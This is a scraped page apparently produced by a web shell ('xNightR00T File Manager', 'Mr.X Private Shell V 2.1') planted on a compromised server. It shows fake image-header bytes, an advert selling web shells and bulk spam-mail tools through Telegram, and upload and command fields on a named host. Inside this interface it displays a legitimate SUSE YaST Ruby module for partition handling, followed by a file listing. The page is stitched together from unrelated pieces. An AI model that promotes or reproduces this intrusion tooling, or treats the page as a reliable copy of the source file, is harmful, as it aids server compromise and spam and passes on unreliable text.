xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# encoding: utf-8

# Copyright (c) [2012-2014] Novell, Inc.
#
# All Rights Reserved.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of version 2 of the GNU General Public License as published
# by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE.  See the GNU General Public License for
# more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, contact Novell, Inc.
#
# To contact Novell about this file by physical or electronic mail, you may
# find current contact information at www.novell.com.

# Module:	Partitions.ycp
#
# Authors:	Thomas Fehr <fehr@suse.de>
#		Arvin Schnell <aschnell@suse.de>
#
# Purpose:	Provides information about partitions
#
# $Id$
require "storage"
require "yast"

module Yast
  class PartitionsClass < Module


    include Yast::Logger


    def main

      textdomain "storage"

      Yast.import "Arch"
      Yast.import "Mode"
      Yast.import "Stage"
      Yast.import "AsciiFile"
      Yast.import "StorageInit"

      # The filesystem ids for the partitions
      @fsid_empty = 0
      @fsid_native = 131
      @fsid_swap = 130
      @fsid_lvm = 142
      @fsid_raid = 253
      @fsid_hibernation = 160
      @fsid_extended = 5
      @fsid_extended_win = 15
      @fsid_fat16 = 6
      @fsid_fat32 = 12
      @fsid_prep_chrp_boot = 65
      @fsid_mac_hidden = 257
      @fsid_mac_hfs = 258
      @fsid_mac_ufs = 262
      @fsid_gpt_boot = 259
      @fsid_gpt_service = 260
      @fsid_gpt_msftres = 261
      @fsid_bios_grub = 263
      @fsid_gpt_prep = 264
      @fsid_freebsd = 165
      @fsid_openbsd = 166
      @fsid_netbsd = 169
      @fsid_beos = 235
      @fsid_solaris = 191
      @fsid_root = @fsid_native

      @boot_cyl = 0
      @boot_mount_point = ""
      @memory_size = 0

      @no_fsid_menu = Arch.s390

      @raid_name = "MD RAID"
      @lv_name = "LV"
      @dm_name = "DM"
      @loop_name = "Loop Device"
      @dmraid_name = "DM RAID"
      @dmmultipath_name = "DM Multipath"
      @nfs_name = "NFS"
      @btrfs_name = "BTRFS"
      @tmpfs_name = "TMPFS"

      # filesystems for /win
      @fsid_wintypes = [6, 11, 12, 14] # FAT32, Win95-Fat32, Win95LBA, Win95-Fat16

      # filesystems for /dos
      @fsid_dostypes = [1, 4] # FAT12, FAT16

      # filesystems for /windows
      @fsid_ntfstypes = [7, 23] # NTFS

      # filesystems mounted read-only
      @fsid_readonly = [7, 23]

      # filesystems skipped on sparc and axp
      @fsid_skipped = [0, 5]

      # partition ids not to delete when suggesting to use whole disk
      @do_not_delete = [18, 222, @fsid_mac_hfs, @fsid_gpt_service]

      # partition ids not to display as windows when fat32 is on it
      @no_windows = [
        18,
        130,
        222,
        @fsid_gpt_boot,
        @fsid_gpt_service,
        @fsid_gpt_msftres
      ]

      @boot_size_k = {}

      @default_fs = :unknown
      @default_boot_fs = :unknown
      @default_home_fs = :xfs

      @sint = nil

      @prep_boot_first = true
    end

    def InitSlib(value)
      @sint = value
      nil
    end

    def assertInit
      if @sint == nil
        @sint = StorageInit.CreateInterface(false)
        Builtins.y2error("StorageInit::CreateInterface failed") if @sint == nil
      end

      nil
    end


    def EfiBoot
      assertInit
      ret = @sint.getEfiBoot
      Builtins.y2milestone("EfiBoot ret:%1", ret)
      ret
    end


    def SetDefaultFs(new_default_fs)
      @default_fs = new_default_fs
      @default_boot_fs = :unknown

      nil
    end


    def DefaultFs
      if @default_fs == :unknown
        tmp = Convert.to_string(SCR.Read(path(".sysconfig.storage.DEFAULT_FS")))
        if tmp == nil ||
            !Builtins.contains(
              ["ext2", "ext3", "ext4", "reiser", "xfs", "btrfs"],
              Builtins.tolower(tmp)
            )
          tmp = "ext4"
        end

        @default_fs = Builtins.tosymbol(Builtins.tolower(tmp))
      end
      @default_fs
    end


    def DefaultBootFs
      if @default_boot_fs == :unknown
        if DefaultFs() != :btrfs
          @default_boot_fs = DefaultFs()
        else
          @default_boot_fs = :ext4
        end
        if EfiBoot()
          @default_boot_fs = :vfat
        elsif Arch.board_mac
          @default_boot_fs = :hfs
        elsif Arch.s390
          @default_boot_fs = :ext2
        end
      end
      @default_boot_fs
    end


    def DefaultHomeFs()
      @default_home_fs
    end


    def SetDefaultHomeFs(new_default_home_fs)
      @default_home_fs = new_default_home_fs
    end


    def BootMount
      if @boot_mount_point == ""
        @boot_mount_point = "/boot"
        @boot_mount_point = "/boot/efi" if EfiBoot()
        @boot_mount_point = "/boot/zipl" if Arch.s390
      end
      @boot_mount_point
    end


    def BootSizeK
      if Builtins.isempty(@boot_size_k)
        @boot_size_k = {
          :proposed => 400 * 1024,
          :minimal  => 90 * 1024,
          :maximal  => 750 * 1024
        }
        Ops.set(@boot_size_k, :proposed, 150 * 1024) if EfiBoot()

        if Arch.aarch64 && !EfiBoot()
          # Has higher requirements on BTRFS since pagesize==sectorsize = 64k
          # See bsc#979037
          Ops.set(@boot_size_k, :proposed, 660 * 1024)
          Ops.set(@boot_size_k, :minimal, 650 * 1024)
        elsif Arch.ia64
          Ops.set(@boot_size_k, :proposed, 200 * 1024)
          Ops.set(@boot_size_k, :minimal, 180 * 1024)
        elsif Arch.board_chrp || Arch.board_prep || Arch.board_iseries
          Ops.set(@boot_size_k, :proposed, 8032 )
          Ops.set(@boot_size_k, :minimal, 8032 )
        elsif Arch.board_mac
          Ops.set(@boot_size_k, :proposed, 32 * 1024)
          Ops.set(@boot_size_k, :minimal, 800)
        elsif Arch.s390
          Ops.set(@boot_size_k, :proposed, 200 * 1024)
          Ops.set(@boot_size_k, :minimal, 100 * 1024)
        end

        Builtins.y2milestone("BootSizeK boot_size_k:%1", @boot_size_k)
      end

      deep_copy(@boot_size_k)
    end


    def MinimalNeededBootsize
      Ops.multiply(1024, Ops.get(BootSizeK(), :proposed, 0))
    end

    def ProposedBootsize
      Ops.multiply(1024, Ops.get(BootSizeK(), :proposed, 0))
    end

    def MinimalBootsize
      Ops.multiply(1024, Ops.get(BootSizeK(), :minimal, 0))
    end

    def MaximalBootsize
      Ops.multiply(1024, Ops.get(BootSizeK(), :maximal, 0))
    end


    def BootCyl
      if @boot_cyl == 0
        @boot_cyl = 1024
        if !Arch.i386
          # Assume on non-i386 archs machine can boot from every cylinder
          @boot_cyl = 4 * 1024 * 1024 * 1024
        else
          internal_bios = Convert.convert(
            SCR.Read(path(".probe.bios")),
            :from => "any",
            :to   => "list <map>"
          )
          lba = Ops.get_boolean(internal_bios, [0, "lba_support"], false)
          Builtins.y2milestone("BootCyl lba_support %1", lba)
          if !lba
            st = Convert.to_map(
              SCR.Read(path(".target.stat"), "/proc/xen/capabilities")
            )
            Builtins.y2milestone("BootCyl /proc/xen/capabilities %1", st)
            if Ops.greater_than(Builtins.size(st), 0)
              lba = Ops.greater_than(
                Convert.to_integer(
                  SCR.Execute(
                    path(".target.bash"),
                    "grep control_d /proc/xen/capabilities"
                  )
                ),
                0
              )
            end
            Builtins.y2milestone("BootCyl lba_support %1", lba)
          end
          @boot_cyl = 4 * 1024 * 1024 * 1024 if lba
        end
      end
      @boot_cyl
    end


    def PrepBoot
      ret = Arch.ppc &&
        (Arch.board_chrp || Arch.board_prep || Arch.board_iseries)
      if ret && @prep_boot_first
        Builtins.y2milestone("PrepBoot ret:%1", ret)
        @prep_boot_first = false
      end
      ret
    end


    # @return [boolean] true iff the boot partition must be a primary partition
    #   (with MSDOS disk label)
    def BootPrimary()
      return PrepBoot()
    end


    def FsidBoot(dlabel)
      fsid_boot = @fsid_native
      if EfiBoot() || Arch.ia64()
        fsid_boot = @fsid_gpt_boot
      elsif PrepBoot()
        fsid_boot = dlabel == "gpt" ? @fsid_gpt_prep : @fsid_prep_chrp_boot
      elsif Arch.board_mac()
        fsid_boot = @fsid_mac_hfs
      end
      return fsid_boot
    end


    def NeedBoot
      ret = false
      if EfiBoot() || Arch.ia64 || (Arch.ppc and !Arch.board_powernv)|| Arch.sparc || Arch.alpha || Arch.s390
        ret = true
      end
      Builtins.y2milestone("NeedBoot ret:%1", ret)
      ret
    end


    def IsDosPartition(fsid)
      Builtins.contains(@fsid_dostypes, fsid) ||
        Builtins.contains(@fsid_wintypes, fsid)
    end

    def IsDosWinNtPartition(fsid)
      IsDosPartition(fsid) || Builtins.contains(@fsid_ntfstypes, fsid)
    end

    def IsExtendedPartition(fsid)
      fsid == @fsid_extended || fsid == @fsid_extended_win
    end

    def IsSwapPartition(fsid)
      !IsDosWinNtPartition(fsid) && fsid == @fsid_swap
    end

    def IsPrepPartition(fsid)
      return fsid == @fsid_prep_chrp_boot || fsid == @fsid_gpt_prep
    end


    def SwapSizeMbforSwap(slot_size)
      swap_size = 0

      if slot_size == 0
        if Ops.less_or_equal(@memory_size, 256)
          swap_size = Ops.multiply(@memory_size, 2)
        else
          swap_size = Ops.add(@memory_size, Ops.divide(@memory_size, 2))
        end
      else
        if Ops.less_than(Ops.multiply(@memory_size, 9), slot_size)
          swap_size = Ops.multiply(@memory_size, 2)
        elsif Ops.less_than(Ops.multiply(@memory_size, 5), slot_size)
          swap_size = @memory_size
        elsif Ops.less_than(Ops.multiply(@memory_size, 3), slot_size)
          swap_size = Ops.divide(@memory_size, 2)
        elsif Ops.less_than(Ops.multiply(@memory_size, 2), slot_size)
          swap_size = Ops.divide(@memory_size, 3)
        else
          swap_size = Ops.divide(@memory_size, 4)
        end
      end

      swap_size = 2048 if Ops.greater_than(swap_size, 2048)
      swap_size = 0 if Ops.less_than(swap_size, 0)


      # look for a min size
      # 1G    -> 128MB
      # 2G    -> 256MB
      # 10G   -> 512MB
      # 40G   -> 1GB

      if Ops.greater_than(slot_size, 40 * 1024) &&
          Ops.less_than(Ops.add(swap_size, @memory_size), 1024)
        swap_size = Ops.subtract(1024, @memory_size)
      elsif Ops.greater_than(slot_size, 10 * 1024) &&
          Ops.less_than(Ops.add(swap_size, @memory_size), 512)
        swap_size = Ops.subtract(512, @memory_size)
      elsif Ops.greater_than(slot_size, 2 * 1024) &&
          Ops.less_than(Ops.add(swap_size, @memory_size), 256)
        swap_size = Ops.subtract(256, @memory_size)
      elsif Ops.greater_than(slot_size, 1 * 1024) &&
          Ops.less_than(Ops.add(swap_size, @memory_size), 128)
        swap_size = Ops.subtract(128, @memory_size)
      end

      swap_size = -1 if swap_size == 0
      Builtins.y2milestone(
        "SwapSizeMbforSwap mem %1 slot_size %2 swap_size %3",
        @memory_size,
        slot_size,
        swap_size
      )
      swap_size
    end

    def SwapSizeMbforSuspend
      ret = Ops.multiply(Ops.divide(Ops.add(@memory_size, 511), 512), 512)
      Builtins.y2milestone("SwapSizeMbforSuspend %1", ret)
      ret
    end

    def SwapSizeMb(slot_size, suspend)
      if @memory_size == 0
        mem_info_map = Convert.to_map(SCR.Read(path(".proc.meminfo")))
        @memory_size = Ops.divide(
          Ops.get_integer(mem_info_map, "memtotal", 0),
          1024
        )
        Builtins.y2milestone(
          "mem_info_map:%1 mem:%2",
          mem_info_map,
          @memory_size
        )
      end
      sw = SwapSizeMbforSwap(slot_size)
      if suspend
        news = SwapSizeMbforSuspend()
        sw = news if Ops.greater_than(news, sw)
      end
      Builtins.y2milestone("SwapSizeMb suspend:%1 ret:%2", suspend, sw)
      sw
    end


    def IsResizable(fsid)
      ret = [@fsid_swap, @fsid_native, @fsid_gpt_boot].include?(fsid) ||
        IsDosWinNtPartition(fsid) || IsExtendedPartition(fsid)
      log.info("IsResizable fsid:#{fsid} ret:#{ret}")
      return ret
    end


    def IsLinuxPartition(fsid)
      fsid == @fsid_native || fsid == @fsid_swap || fsid == @fsid_lvm ||
        fsid == @fsid_raid ||
        fsid == @fsid_gpt_boot
    end

    def GetLoopOn(device)
      ret = {}
      cmd = Builtins.sformat("/sbin/losetup %1", device)
      bash_call = Convert.to_map(
        SCR.Execute(path(".target.bash_output"), cmd, {})
      )
      if Ops.get_integer(bash_call, "exit", 1) == 0
        text = Ops.get_string(bash_call, "stdout", "")
        fi = Builtins.search(text, ")")
        if fi != nil && Ops.greater_than(fi, 0)
          text = Builtins.substring(text, 0, fi)
          fi = Builtins.search(text, "(")
          if fi != nil && Ops.greater_than(fi, 0)
            text = Builtins.substring(text, Ops.add(fi, 1))
            Ops.set(ret, "file", text)
            stat = Convert.to_map(SCR.Read(path(".target.stat"), text))
            Ops.set(ret, "blockdev", Ops.get_boolean(stat, "isblock", false))
          end
        end
      end
      Builtins.y2milestone("dev %1 ret %2", device, ret)
      deep_copy(ret)
    end

    def TranslateMapperName(device)
      ret = device
      regex = "[^-](--)*-[^-]"
      if Builtins.search(device, "/dev/mapper/") == 0
        pos = Builtins.regexppos(device, regex)
        Builtins.y2milestone("pos=%1", pos)
        if Ops.greater_than(Builtins.size(pos), 0)
          ret = Ops.add(
            Ops.add(
              Ops.add(
                "/dev/",
                Builtins.substring(
                  device,
                  12,
                  Ops.subtract(
                    Ops.add(Ops.get(pos, 0, 0), Ops.get(pos, 1, 0)),
                    14
                  )
                )
              ),
              "/"
            ),
            Builtins.substring(
              device,
              Ops.subtract(Ops.add(Ops.get(pos, 0, 0), Ops.get(pos, 1, 0)), 1)
            )
          )
          spos = 4
          newpos = Builtins.search(Builtins.substring(ret, spos), "--")
          if newpos != nil
            spos = Ops.add(spos, newpos)
          else
            spos = -1
          end
          while Ops.greater_or_equal(spos, 0)
            ret = Ops.add(
              Builtins.substring(ret, 0, Ops.add(spos, 1)),
              Builtins.substring(ret, Ops.add(spos, 2))
            )
            spos = Ops.add(spos, 1)
            newpos = Builtins.search(Builtins.substring(ret, spos), "--")
            if newpos != nil
              spos = Ops.add(spos, newpos)
            else
              spos = -1
            end
          end
        end
        Builtins.y2milestone("TranslateMapperName %1 -> %2", device, ret)
      end
      ret
    end

    #	Return a list with all mounted partition
    #  @return [Array<Hash>]
    def CurMounted
      SCR.UnmountAgent(path(".proc.mounts"))
      SCR.UnmountAgent(path(".proc.swaps"))
      SCR.UnmountAgent(path(".etc.mtab"))
      mounts = Convert.convert(
        SCR.Read(path(".proc.mounts")),
        :from => "any",
        :to   => "list <map>"
      )
      swaps = Convert.convert(
        SCR.Read(path(".proc.swaps")),
        :from => "any",
        :to   => "list <map>"
      )
      mtab = Convert.convert(
        SCR.Read(path(".etc.mtab")),
        :from => "any",
        :to   => "list <map>"
      )

      if mounts == nil || swaps == nil || mtab == nil
        Builtins.y2error(
          "failed to read .proc.mounts or .proc.swaps or .etc.mtab"
        )
        return []
      end

      Builtins.foreach(swaps) do |swap|
        swap_entry = {
          "file" => "swap",
          "spec" => Ops.get_string(swap, "file", "")
        }
        mounts = Builtins.add(mounts, swap_entry)
      end

      mtab_root = Builtins.find(mtab) do |mount|
        Ops.get_string(mount, "file", "") == "/"
      end
      root_map = Builtins.find(mounts) do |mount|
        Ops.get_string(mount, "spec", "") == "/dev/root"
      end
      root_map = Builtins.find(mounts) do |mount|
        Ops.get_string(mount, "spec", "") != "rootfs" &&
          Ops.get_string(mount, "file", "") == "/"
      end if root_map == nil
      Builtins.y2milestone("mtab_root %1 root_map %2", mtab_root, root_map)
      #    root_map = add (root_map, "spec", mtab_root["spec"]:"");
      if Ops.get_string(root_map, "spec", "") == "/dev/root"
        Ops.set(root_map, "spec", Ops.get_string(mtab_root, "spec", ""))
      end
      if (Builtins.search(Ops.get_string(root_map, "spec", ""), "LABEL=") == 0 ||
          Builtins.search(Ops.get_string(root_map, "spec", ""), "UUID=") == 0) &&
          !Stage.initial
        bo = Convert.to_map(
          SCR.Execute(path(".target.bash_output"), "fsck -N /", {})
        )
        Builtins.y2milestone("CurMounted bo:%1", bo)
        dev = ""
        if Ops.get_integer(bo, "exit", 1) == 0
          tmp = Builtins.filter(
            Builtins.splitstring(Ops.get_string(bo, "stdout", ""), " \n")
          ) { |k| Ops.greater_than(Builtins.size(k), 0) }
          if Ops.greater_than(Builtins.size(tmp), 0)
            dev = Ops.get_string(tmp, Ops.subtract(Builtins.size(tmp), 1), "")
          end
          Builtins.y2milestone("CurMounted LABEL/UUID dev:%1", dev)
        end
        if Ops.greater_than(Builtins.size(dev), 0)
          Ops.set(root_map, "spec", dev)
        end
      end
      Builtins.y2milestone("root_map %1", root_map)
      #    this version makes some problems with interpreter, above lookup/add is OK
      mounts = Builtins.filter(mounts) do |mount|
        Ops.get_string(mount, "file", "") != "/"
      end
      mounts = Builtins.add(mounts, root_map)
      ret = []
      Builtins.foreach(mounts) do |p|
        if Builtins.search(Ops.get_string(p, "spec", ""), "/dev/loop") != nil
          r = GetLoopOn(Ops.get_string(p, "spec", ""))
          if Ops.get_boolean(r, "blockdev", false)
            Ops.set(p, "loop_on", Ops.get_string(r, "file", ""))
          end
        end
        ret = Builtins.add(ret, p)
      end
      ret = Builtins.maplist(ret) do |p|
        Ops.set(p, "spec", TranslateMapperName(Ops.get_string(p, "spec", "")))
        deep_copy(p)
      end
      Builtins.y2milestone("CurMounted all mounts %1", ret)
      deep_copy(ret)
    end


    def GetFstab(pathname)
      file = {}
      file_ref = arg_ref(file)
      AsciiFile.SetComment(file_ref, "^[ \t]*#")
      file = file_ref.value
      file_ref = arg_ref(file)
      AsciiFile.SetDelimiter(file_ref, " \t")
      file = file_ref.value
      file_ref = arg_ref(file)
      AsciiFile.SetListWidth(file_ref, [20, 20, 10, 21, 1, 1])
      file = file_ref.value
      file_ref = arg_ref(file)
      AsciiFile.ReadFile(file_ref, pathname)
      file = file_ref.value
      deep_copy(file)
    end

    def GetCrypto(pathname)
      file = {}
      file_ref = arg_ref(file)
      AsciiFile.SetComment(file_ref, "^[ \t]*#")
      file = file_ref.value
      file_ref = arg_ref(file)
      AsciiFile.SetDelimiter(file_ref, " \t")
      file = file_ref.value
      file_ref = arg_ref(file)
      AsciiFile.SetListWidth(file_ref, [11, 15, 20, 10, 10, 1])
      file = file_ref.value
      file_ref = arg_ref(file)
      AsciiFile.ReadFile(file_ref, pathname)
      file = file_ref.value
      deep_copy(file)
    end


    def ToHexString(num)
      sprintf("0x%02X", num)
    end


    def FsIdToString(fs_id)
      case fs_id
        when 0
          return "empty"
        when 1
          return "FAT12"
        when 2
          return "XENIX root"
        when 3
          return "XENIX usr"
        when 4
          return "FAT16 <32M"
        when 5
          return "Extended"
        when 6
          return "FAT16"
        when 7
          return "HPFS/NTFS"
        when 8
          return "AIX"
        when 9
          return "AIX boot"
        when 10
          return "OS/2 boot manager"
        when 11
          return "Win95 FAT32"
        when 12
          return "Win95 FAT32 LBA"
        when 14
          return "Win95 FAT16"
        when 15
          return "Extended"
        when 167
          return "NeXTSTEP"
        when 183
          return "BSDI fs"
        when 184
          return "BSDI swap"
        when 193
          return "DRDOS/sec"
        when 196
          return "DRDOS/sec"
        when 198
          return "DRDOS/sec"
        when 199
          return "Syrinx"
        when 218
          return "Non-Fs data"
        when 219
          return "CP/M / CTOS"
        when 222
          return "Dell Utility"
        when 225
          return "DOS access"
        when 227
          return "DOS R/O"
        when 228
          return "SpeedStor"
        when 235
          return "BeOS fs"
        when 238
          return "EFI GPT"
        when 239
          return "EFI (FAT-12/16)"
        when 241
          return "SpeedStor"
        when 244
          return "SpeedStor"
        when 242
          return "DOS secondary"
        when 253
          return "Linux RAID"
        when 254
          return "LANstep"
        when 255
          return "BBT or NBO reserved"
        when 16
          return "OPUS"
        when 17
          return "Hidden FAT12"
        when 18
          return "Vendor diag"
        when 20
          return "Hidden FAT16"
        when 22
          return "Hidden FAT16"
        when 23
          return "Hidden HPFS/NTFS"
        when 24
          return "AST Windows"
        when 27
          return "Hidden Win95"
        when 28
          return "Hidden Win95"
        when 30
          return "Hidden Win95"
        when 36
          return "NEC DOS"
        when 57
          return "Plan 9"
        when 60
          return "PartitionMagic"
        when 64
          return "Venix 80286"
        when 65
          return "PReP Boot"
        when 66
          return "SFS"
        when 77
          return "QNX4.x"
        when 78
          return "QNX4.x 2nd par"
        when 79
          return "QNX4.x 3rd par"
        when 80
          return "OnTrack DM"
        when 81
          return "OnTrack DM6"
        when 82
          return "CP/M"
        when 83
          return "OnTrack DM6"
        when 84
          return "OnTrack DM6"
        when 85
          return "EZ-Drive"
        when 86
          return "Golden Bow"
        when 92
          return "Priam Edisk"
        when 97
          return "SpeedStor"
        when 99
          return "GNU HURD"
        when 100
          return "Novell NetWare"
        when 101
          return "Novell NetWare"
        when 112
          return "DiskSecure"
        when 117
          return "PC/IX"
        when 128
          return "Old Minix"
        when 129
          return "Minix"
        when 130
          return "Linux swap"
        when 131
          return "Linux native"
        when 132
          return "OS/2 hidden"
        when 133
          return "Linux extended"
        when 134
          return "NTFS volume"
        when 135
          return "NTFS volume"
        when 142
          return "Linux LVM"
        when 147
          return "Amoeba"
        when 148
          return "Amoeba BBT"
        when 159
          return "BSD/OS"
        when 160
          return "Hibernation"
        when 165
          return "FreeBSD"
        when 166
          return "OpenBSD"
        when 169
          return "NetBSD"
        when 258
          return "Apple_HFS"
        when 259
          return "EFI boot"
        when 260
          return "Service"
        when 261
          return "Microsoft reserved"
        when 262
          return "Apple_UFS"
        when 263
          return "BIOS Grub"
        when 264
          return "GPT PReP"
        else
          return "unknown"
      end
    end


    def MaxPrimary(dlabel)
      ret = 0
      assertInit
      caps = ::Storage::DlabelCapabilities.new()
      if( @sint.getDlabelCapabilities(dlabel, caps))
        ret = caps.maxPrimary
      end
      Builtins.y2milestone("MaxPrimary dlabel:%1 ret:%2", dlabel, ret)
      ret
    end


    def HasExtended(dlabel)
      ret = false
      assertInit
      caps = ::Storage::DlabelCapabilities.new()
      if( @sint.getDlabelCapabilities( dlabel, caps))
        ret = caps.extendedPossible
      end
      Builtins.y2milestone("HasExtended dlabel:%1 ret:%2", dlabel, ret)
      ret
    end


    def MaxLogical(dlabel)
      ret = 0
      assertInit
      caps = ::Storage::DlabelCapabilities.new()
      if( @sint.getDlabelCapabilities( dlabel, caps))
        ret = caps.maxLogical
      end
      Builtins.y2milestone("MaxLogical dlabel:%1 ret:%2", dlabel, ret)
      ret
    end


    def MaxSectors(dlabel)
      ret = 0
      assertInit
      caps = ::Storage::DlabelCapabilities.new()
      if( @sint.getDlabelCapabilities( dlabel, caps))
        ret = caps.maxSectors
      end
      Builtins.y2milestone("MaxSizeK dlabel:%1 ret:%2", dlabel, ret)
      ret
    end


    def RdonlyText(disk, expert_partitioner)
      disk = deep_copy(disk)
      text = ""
      device = disk["device"] || ""
      ldl_dasd = (disk["dasd_format"] == ::Storage::DASDF_LDL)

      if expert_partitioner
        text = _("Operation not permitted on disk %{device}.\n") % {:device => device}
      end

      if ldl_dasd
        # popup text %{device} is replaced by disk name e.g. /dev/hda
        text << _(
                "\n" +
                  "It's not supported by the partitioning tool parted to change\n" +
                  "the partition table on your disk %{device}\n" +
                  "(the disk is LDL formatted).\n" +
                  "\n" +
                  "You can use the partitions on disk %{device} as they are or\n" +
                  "format them and assign mount points, but you cannot add,\n" +
                  "resize, or remove partitions from that disk here.\n"
                 ) % {:device => device}
      elsif !disk["has_fake_partition"]
        # popup text %{device} is replaced by disk name e.g. /dev/hda
        text << _(
                "\n" +
                  "The partitioning on your disk %{device} is either not readable or not \n" +
                  "supported by the partitioning tool parted used to change the\n" +
                  "partition table.\n" +
                  "\n" +
                  "You can use the partitions on disk %{device} as they are or\n" +
                  "format them and assign mount points, but you cannot add, edit, \n" +
                  "resize, or remove partitions from that disk here.\n"
                 ) % {:device => device}
      else
        # popup text %{device} is replaced by disk name e.g. /dev/dasda
        text << _(
                "\n" +
                  "The disk %{device} does not contain a partition table but for\n" +
                  "compatibility the kernel has automatically generated a\n" +
                  "partition spanning almost the entire disk.\n" +
                  "\n" +
                  "You can use the partition on disk %{device} as it is or\n" +
                  "format it and assign a mount point, but you cannot resize\n" +
                  "or remove the partition from that disk here.\n"
                 ) % {:device => device}
      end

      if expert_partitioner
        # it's not supported to create a new partition table on LDL DASDs (bnc#958893)
        if !ldl_dasd
          # popup text
          text << _(
                  "\n" +
                   "\n" +
                     "You can initialize the disk partition table to a sane state in the Expert\n" +
                     "Partitioner by selecting \"Expert\"->\"Create New Partition Table\", \n" +
                     "but this will destroy all data on all partitions of this disk.\n"
                   )
        end
      else
        # popup text
        text << _(
                "\n" +
                  "\n" +
                  "Safely ignore this message if you do not intend to use \n" +
                   "this disk during installation.\n"
                  )
      end
      text
    end

    # Determines whether a PReP boot partition is needed
    #
    # iSeries does not really need a boot partition: a bootable binary will be
    # written to a kernel slot in /proc.
    #
    # @return [Boolean] 'true' if boot partition is needed; 'false' otherwise.
    def prep_boot_needed?
      PrepBoot() && !Arch.board_iseries
    end
    alias_method :prep_boot_needed, :prep_boot_needed?

    publish :variable => :fsid_empty, :type => "const integer"
    publish :variable => :fsid_native, :type => "const integer"
    publish :variable => :fsid_swap, :type => "const integer"
    publish :variable => :fsid_lvm, :type => "const integer"
    publish :variable => :fsid_raid, :type => "const integer"
    publish :variable => :fsid_hibernation, :type => "const integer"
    publish :variable => :fsid_extended, :type => "const integer"
    publish :variable => :fsid_extended_win, :type => "const integer"
    publish :variable => :fsid_fat16, :type => "const integer"
    publish :variable => :fsid_fat32, :type => "const integer"
    publish :variable => :fsid_prep_chrp_boot, :type => "const integer"
    publish :variable => :fsid_gpt_prep, :type => "const integer"
    publish :variable => :fsid_mac_hidden, :type => "const integer"
    publish :variable => :fsid_mac_hfs, :type => "const integer"
    publish :variable => :fsid_mac_ufs, :type => "const integer"
    publish :variable => :fsid_gpt_boot, :type => "const integer"
    publish :variable => :fsid_gpt_service, :type => "const integer"
    publish :variable => :fsid_gpt_msftres, :type => "const integer"
    publish :variable => :fsid_bios_grub, :type => "const integer"
    publish :variable => :fsid_freebsd, :type => "const integer"
    publish :variable => :fsid_openbsd, :type => "const integer"
    publish :variable => :fsid_netbsd, :type => "const integer"
    publish :variable => :fsid_beos, :type => "const integer"
    publish :variable => :fsid_solaris, :type => "const integer"
    publish :variable => :fsid_root, :type => "const integer"
    publish :variable => :no_fsid_menu, :type => "boolean"
    publish :variable => :raid_name, :type => "string"
    publish :variable => :lv_name, :type => "string"
    publish :variable => :dm_name, :type => "string"
    publish :variable => :loop_name, :type => "string"
    publish :variable => :dmraid_name, :type => "string"
    publish :variable => :dmmultipath_name, :type => "string"
    publish :variable => :nfs_name, :type => "string"
    publish :variable => :btrfs_name, :type => "string"
    publish :variable => :tmpfs_name, :type => "string"
    publish :variable => :fsid_wintypes, :type => "const list <integer>"
    publish :variable => :fsid_dostypes, :type => "const list <integer>"
    publish :variable => :fsid_ntfstypes, :type => "const list <integer>"
    publish :variable => :fsid_readonly, :type => "const list <integer>"
    publish :variable => :fsid_skipped, :type => "const list <integer>"
    publish :variable => :do_not_delete, :type => "const list <integer>"
    publish :variable => :no_windows, :type => "const list <integer>"
    publish :function => :InitSlib, :type => "void (any)"
    publish :function => :EfiBoot, :type => "boolean ()"
    publish :function => :SetDefaultFs, :type => "void (symbol)"
    publish :function => :DefaultFs, :type => "symbol ()"
    publish :function => :DefaultBootFs, :type => "symbol ()"
    publish :function => :BootMount, :type => "string ()"
    publish :function => :MinimalNeededBootsize, :type => "integer ()"
    publish :function => :ProposedBootsize, :type => "integer ()"
    publish :function => :MinimalBootsize, :type => "integer ()"
    publish :function => :MaximalBootsize, :type => "integer ()"
    publish :function => :BootCyl, :type => "integer ()"
    publish :function => :PrepBoot, :type => "boolean ()"
    publish :function => :BootPrimary, :type => "boolean ()"
    publish :function => :FsidBoot, :type => "integer (string)"
    publish :function => :NeedBoot, :type => "boolean ()"
    publish :function => :IsDosPartition, :type => "boolean (integer)"
    publish :function => :IsDosWinNtPartition, :type => "boolean (integer)"
    publish :function => :IsExtendedPartition, :type => "boolean (integer)"
    publish :function => :IsSwapPartition, :type => "boolean (integer)"
    publish :function => :IsPrepPartition, :type => "boolean (integer)"
    publish :function => :SwapSizeMb, :type => "integer (integer, boolean)"
    publish :function => :IsResizable, :type => "boolean (integer)"
    publish :function => :IsLinuxPartition, :type => "boolean (integer)"
    publish :function => :GetLoopOn, :type => "map (string)"
    publish :function => :TranslateMapperName, :type => "string (string)"
    publish :function => :CurMounted, :type => "list <map> ()"
    publish :function => :GetFstab, :type => "map (string)"
    publish :function => :GetCrypto, :type => "map (string)"
    publish :function => :ToHexString, :type => "string (integer)"
    publish :function => :FsIdToString, :type => "string (integer)"
    publish :function => :MaxPrimary, :type => "integer (string)"
    publish :function => :HasExtended, :type => "boolean (string)"
    publish :function => :MaxLogical, :type => "integer (string)"
    publish :function => :MaxSectors, :type => "integer (string)"
    publish :function => :RdonlyText, :type => "string (map <string, any>, boolean)"
    publish :function => :prep_boot_needed, :type => "boolean ()"
  end

  Partitions = PartitionsClass.new
  Partitions.main
end

Filemanager

Name Type Size Permission Actions
YaPI Folder 0755
YaST Folder 0755
ALog.rb File 3.26 KB 0644
AddOnProduct.rb File 78.59 KB 0644
Address.rb File 3.45 KB 0644
